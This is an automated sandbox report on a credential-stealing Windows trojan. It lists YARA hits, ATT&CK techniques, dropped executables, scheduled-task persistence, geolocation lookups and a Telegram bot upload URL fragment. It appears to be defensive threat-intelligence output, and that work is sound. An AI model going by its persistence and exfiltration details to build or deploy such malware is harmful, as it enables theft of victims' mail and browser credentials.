                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35bde10.9.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.358ddc0.11.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.0.server01.exe.4e0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35bde10.9.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.358ddc0.11.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.F7Xu8bRnXT.exe.35a5df0.8.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000000.2240972319.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.2245104085.0000000003575000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: F7Xu8bRnXT.exe PID: 7092, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: server01.exe PID: 2200, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                              Native API
                              1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              11
                              Disable or Modify Tools
                              1
                              OS Credential Dumping
                              1
                              System Time Discovery
                              Remote Services11
                              Archive Collected Data
                              1
                              Ingress Tool Transfer
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts2
                              Command and Scripting Interpreter
                              1
                              Scheduled Task/Job
                              11
                              Process Injection
                              11
                              Deobfuscate/Decode Files or Information
                              1
                              Input Capture
                              1
                              File and Directory Discovery
                              Remote Desktop Protocol1
                              Data from Local System
                              11
                              Encrypted Channel
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Scheduled Task/Job
                              2
                              Registry Run Keys / Startup Folder
                              1
                              Scheduled Task/Job
                              3
                              Obfuscated Files or Information
                              Security Account Manager24
                              System Information Discovery
                              SMB/Windows Admin Shares1
                              Screen Capture
                              2
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                              Registry Run Keys / Startup Folder
                              11
                              Software Packing
                              NTDS131
                              Security Software Discovery
                              Distributed Component Object Model1
                              Email Collection
                              13
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              Timestomp
                              LSA Secrets31
                              Virtualization/Sandbox Evasion
                              SSH1
                              Input Capture
                              Fallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              DLL Side-Loading
                              Cached Domain Credentials2
                              Process Discovery
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              Masquerading
                              DCSync1
                              Application Window Discovery
                              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                              Virtualization/Sandbox Evasion
                              Proc Filesystem1
                              System Network Configuration Discovery
                              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                              Process Injection
                              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562296 Sample: F7Xu8bRnXT.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 44 reallyfreegeoip.org 2->44 46 checkip.dyndns.org 2->46 48 checkip.dyndns.com 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Antivirus / Scanner detection for submitted sample 2->54 58 12 other signatures 2->58 9 F7Xu8bRnXT.exe 6 2->9         started        signatures3 56 Tries to detect the country of the analysis system (by using the IP) 44->56 process4 file5 32 C:\Users\user\AppData\Local\...\server01.exe, PE32 9->32 dropped 34 C:\Users\user\AppData\...\Trading_AIBot.exe, PE32 9->34 dropped 36 C:\Users\user\AppData\...\F7Xu8bRnXT.exe.log, ASCII 9->36 dropped 12 Trading_AIBot.exe 5 9->12         started        16 server01.exe 15 2 9->16         started        process6 dnsIp7 38 C:\Users\user\AppData\Roaming\...\apihost.exe, PE32 12->38 dropped 64 Antivirus detection for dropped file 12->64 66 Multi AV Scanner detection for dropped file 12->66 68 Machine Learning detection for dropped file 12->68 74 3 other signatures 12->74 19 powershell.exe 23 12->19         started        22 apihost.exe 2 12->22         started        24 schtasks.exe 1 12->24         started        40 checkip.dyndns.com 158.101.44.242, 49721, 80 ORACLE-BMC-31898US United States 16->40 42 reallyfreegeoip.org 172.67.177.134, 443, 49724 CLOUDFLARENETUS United States 16->42 70 Tries to steal Mail credentials (via file / registry access) 16->70 72 Tries to harvest and steal browser information (history, passwords, etc) 16->72 file8 signatures9 process10 signatures11 60 Loading BitLocker PowerShell Module 19->60 26 WmiPrvSE.exe 19->26         started        28 conhost.exe 19->28         started        62 Antivirus detection for dropped file 22->62 30 conhost.exe 24->30         started        process12

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              F7Xu8bRnXT.exe39%ReversingLabsByteCode-MSIL.Trojan.Dopping
                              F7Xu8bRnXT.exe100%AviraHEUR/AGEN.1329567
                              F7Xu8bRnXT.exe100%Joe Sandbox ML
                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe100%AviraTR/Dropper.Gen
                              C:\Users\user\AppData\Roaming\ACCApi\apihost.exe100%AviraTR/Dropper.Gen
                              C:\Users\user\AppData\Local\Temp\server01.exe100%AviraTR/ATRAPS.Gen
                              C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\server01.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe79%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                              C:\Users\user\AppData\Local\Temp\server01.exe79%ReversingLabsByteCode-MSIL.Infostealer.Mintluks
                              No Antivirus matches
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              https://goAppVClientCmdlets.psm1h0%Avira URL Cloudsafe
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              reallyfreegeoip.org
                              172.67.177.134
                              truefalse
                                high
                                checkip.dyndns.com
                                158.101.44.242
                                truefalse
                                  high
                                  checkip.dyndns.org
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://reallyfreegeoip.org/xml/8.46.123.75false
                                      high
                                      http://checkip.dyndns.org/false
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2323102165.0000000005366000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2317843796.0000000004456000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.2317843796.0000000004456000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2317843796.0000000004456000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://reallyfreegeoip.orgdserver01.exe, 00000003.00000002.3486443994.000000000288B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://goAppVClientCmdlets.psm1hpowershell.exe, 00000004.00000002.2335088323.0000000006E4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://contoso.com/Licensepowershell.exe, 00000004.00000002.2323102165.0000000005366000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://contoso.com/Iconpowershell.exe, 00000004.00000002.2323102165.0000000005366000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.orgserver01.exe, 00000003.00000002.3486443994.000000000286E000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000003.00000002.3486443994.000000000285C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2317843796.0000000004456000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://reallyfreegeoip.org/xml/8.46.123.75lserver01.exe, 00000003.00000002.3486443994.000000000286E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.micropowershell.exe, 00000004.00000002.2335845547.0000000006E97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://checkip.dyndns.comdserver01.exe, 00000003.00000002.3486443994.000000000286E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.2317843796.0000000004301000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://reallyfreegeoip.org/xml/8.46.123.75dserver01.exe, 00000003.00000002.3486443994.000000000286E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://checkip.dyndns.org/qF7Xu8bRnXT.exe, 00000001.00000002.2245104085.0000000003575000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000003.00000000.2240972319.00000000004E2000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.2317843796.0000000004456000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://contoso.com/powershell.exe, 00000004.00000002.2323102165.0000000005366000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2323102165.0000000005366000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://reallyfreegeoip.orgserver01.exe, 00000003.00000002.3486443994.000000000288B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://checkip.dyndns.orgdserver01.exe, 00000003.00000002.3486443994.000000000286E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://reallyfreegeoip.orgserver01.exe, 00000003.00000002.3486443994.000000000286E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://checkip.dyndns.comserver01.exe, 00000003.00000002.3486443994.000000000286E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://checkip.dyndns.org/dserver01.exe, 00000003.00000002.3486443994.000000000286E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameserver01.exe, 00000003.00000002.3486443994.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2317843796.0000000004301000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://api.telegram.org/bot-/sendDocument?chat_id=F7Xu8bRnXT.exe, 00000001.00000002.2245104085.0000000003575000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000003.00000000.2240972319.00000000004E2000.00000002.00000001.01000000.00000009.sdmpfalse
                                                                                          high
                                                                                          https://reallyfreegeoip.org/xml/F7Xu8bRnXT.exe, 00000001.00000002.2245104085.0000000003575000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000003.00000000.2240972319.00000000004E2000.00000002.00000001.01000000.00000009.sdmp, server01.exe, 00000003.00000002.3486443994.000000000286E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            158.101.44.242
                                                                                            checkip.dyndns.comUnited States
                                                                                            31898ORACLE-BMC-31898USfalse
                                                                                            172.67.177.134
                                                                                            reallyfreegeoip.orgUnited States
                                                                                            13335CLOUDFLARENETUSfalse
                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1562296
                                                                                            Start date and time:2024-11-25 13:38:12 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 9m 6s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:12
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:F7Xu8bRnXT.exe
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:75691dfc15e24ea4920f9309bc68aedf808fb60379c0410d898cafaab4f8328b.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winEXE@14/10@2/2
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 40%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 97%
                                                                                            • Number of executed functions: 178
                                                                                            • Number of non-executed functions: 46
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Execution Graph export aborted for target Trading_AIBot.exe, PID 1628 because it is empty
                                                                                            • Execution Graph export aborted for target powershell.exe, PID 3504 because it is empty
                                                                                            • Execution Graph export aborted for target server01.exe, PID 2200 because it is empty
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                            • VT rate limit hit for: F7Xu8bRnXT.exe
                                                                                            TimeTypeDescription
                                                                                            07:39:25API Interceptor33x Sleep call for process: powershell.exe modified
                                                                                            07:40:02API Interceptor22106x Sleep call for process: apihost.exe modified
                                                                                            13:39:26Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                            13:39:29AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            158.101.44.242Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            Updated Invoice_0755404645-2024_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            MB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            rPO_1079021908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            PROFORMA + PENDENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • checkip.dyndns.org/
                                                                                            172.67.177.134dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                IMG-20241119-WA0006(162KB).Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                  NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        New shipment AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                          sosoliso.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            rrequestforquotation.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                checkip.dyndns.comdekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 132.226.8.169
                                                                                                                AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                • 132.226.247.73
                                                                                                                denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 193.122.130.0
                                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • 193.122.6.168
                                                                                                                VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 193.122.130.0
                                                                                                                order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 132.226.8.169
                                                                                                                IMG-20241119-WA0006(162KB).Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 193.122.6.168
                                                                                                                NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • 132.226.247.73
                                                                                                                MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 132.226.8.169
                                                                                                                Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 158.101.44.242
                                                                                                                reallyfreegeoip.orgdekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 172.67.177.134
                                                                                                                AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                • 104.21.67.152
                                                                                                                denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.67.152
                                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • 172.67.177.134
                                                                                                                VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 104.21.67.152
                                                                                                                order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 104.21.67.152
                                                                                                                IMG-20241119-WA0006(162KB).Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 172.67.177.134
                                                                                                                NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • 172.67.177.134
                                                                                                                MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 172.67.177.134
                                                                                                                Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.67.152
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                ORACLE-BMC-31898USdenizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 193.122.130.0
                                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • 193.122.6.168
                                                                                                                VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 193.122.130.0
                                                                                                                IMG-20241119-WA0006(162KB).Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 193.122.6.168
                                                                                                                Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 158.101.44.242
                                                                                                                Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 193.122.130.0
                                                                                                                ZEcVl5jzXD.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 193.122.6.168
                                                                                                                powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                • 168.139.6.21
                                                                                                                rrequestforquotation.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 193.122.6.168
                                                                                                                SOA SEP 2024.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                • 193.122.130.0
                                                                                                                CLOUDFLARENETUShttps://go.jrwcap.com/e/955053/230645595232154/6xyvj/710994189/h/-dwcgo8Jrn520ILsDDgocWZSKLzmmTijUb6c_giV2KAGet hashmaliciousPhisherBrowse
                                                                                                                • 104.22.72.81
                                                                                                                dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 172.67.177.134
                                                                                                                AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                • 104.21.67.152
                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 104.21.88.250
                                                                                                                Vendor Agreement Ready for Your Signature November 22 2024 at 084923 PM.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                • 172.67.206.110
                                                                                                                file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                • 104.21.88.250
                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                • 172.67.155.47
                                                                                                                ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                • 172.67.145.234
                                                                                                                http://www.kalenderpedia.deGet hashmaliciousUnknownBrowse
                                                                                                                • 104.18.11.207
                                                                                                                https://protect-us.mimecast.com/s/N4SFCv2zvkHW7wOAuzlFYeGet hashmaliciousUnknownBrowse
                                                                                                                • 104.19.230.21
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                54328bd36c14bd82ddaa0c04b25ed9addekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 172.67.177.134
                                                                                                                AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                • 172.67.177.134
                                                                                                                denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 172.67.177.134
                                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • 172.67.177.134
                                                                                                                VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 172.67.177.134
                                                                                                                order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 172.67.177.134
                                                                                                                IMG-20241119-WA0006(162KB).Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                • 172.67.177.134
                                                                                                                NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • 172.67.177.134
                                                                                                                MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 172.67.177.134
                                                                                                                Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 172.67.177.134
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeZiraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                  PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                    IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                          C:\Users\user\AppData\Local\Temp\server01.exeZiraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                            PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                              Process:C:\Users\user\Desktop\F7Xu8bRnXT.exe
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):520
                                                                                                                              Entropy (8bit):5.355496254154943
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
                                                                                                                              MD5:3C255C75EA6EB42410894C0D08A4E324
                                                                                                                              SHA1:34B3512313867B269C545241CD502B960213293A
                                                                                                                              SHA-256:116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
                                                                                                                              SHA-512:41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
                                                                                                                              Malicious:true
                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2232
                                                                                                                              Entropy (8bit):5.379736180876081
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:tLHyIFKL3IZ2KRH9Oug8s
                                                                                                                              MD5:AE33CC731D64A142DFCC6A541D0708FC
                                                                                                                              SHA1:31B0ECD28CA8892C3EF4B42D1CB1F56BECD14BEA
                                                                                                                              SHA-256:776FC4031835093845318CEABF43AB13C51EC6CA69B985C45049EAE2EB6AF623
